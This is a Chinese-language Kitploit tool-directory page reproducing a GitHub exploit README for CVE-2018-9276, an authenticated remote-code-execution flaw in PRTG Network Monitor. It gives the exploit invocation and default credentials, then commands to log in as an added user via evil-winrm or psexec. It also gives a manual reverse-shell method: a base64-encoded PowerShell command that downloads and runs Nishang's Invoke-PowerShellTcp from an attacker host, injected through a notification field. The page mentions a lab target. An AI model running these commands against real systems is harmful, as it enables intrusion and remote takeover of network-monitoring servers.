Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 反弹Shell(支持Python3) | Kitploit
工具/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Payload生成漏洞利用横向移动Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 反弹Shell(支持Python3)

查看仓库
2125年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 反弹 Shell(支持 Python3)

依赖项

  • Impacket(Python3 版本)
  • Netcat
  • Msfvenom

使用方法

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. 执行漏洞利用需要凭据。尝试默认凭据 prtgadmin:prtgadmin。另外,可能值得检查数据库或日志来获取这些凭据。https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. 如果端口未被占用,可以尝试 --lport 445
  3. 代码中有一些绕弯的注释,可能需要进行一些修改。
  4. 可能需要尝试几次才能成功。重启目标机器通常是个好选择,尤其是当你的 payload 造成一些影响时。

测试覆盖

HTB Netmon 靶机

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

致谢

非常感谢 wildkindcc 的 python2 版本 https://github.com/wildkindcc/CVE-2018-9276

扩展知识

使用 Metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

远程代码执行

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

使用示例

执行漏洞利用需要凭据。首先登录并获取经过身份验证的 cookie,以添加新用户。

./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

高级:无需添加新用户的手动利用

致谢归于 HTB 官方 writeup
POC: https://www.codewatch.org/blog/?p=453 另外可使用 SMB 获取反弹 Shell:https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

如果我们不想添加用户,为了更好的 OPSEC,我们可以获取一个反弹 Shell。然而由于 HTML 编码,许多字符会被编码。我们可以使用 PowerShell base64 执行来绕过这一点。我们需要创建一个 base64 编码的命令。不过,它应使用 Windows 所使用的编码,即 UTF-16LE

❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

我们使用 iconv 将其转换为目标编码,并执行来自 Nishang 的这个反弹 Shell。 https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

下载脚本,并将该命令 echo 追加到最后一行。

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

现在启动一个简单的 HTTP 服务器,并创建一条新通知。

python3 -m http.server 80

点击 Setup > Account Settings > Notifications -> 点击最右侧的 “Add new notification” 点击铃铛按钮来触发通知。

abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

下载工具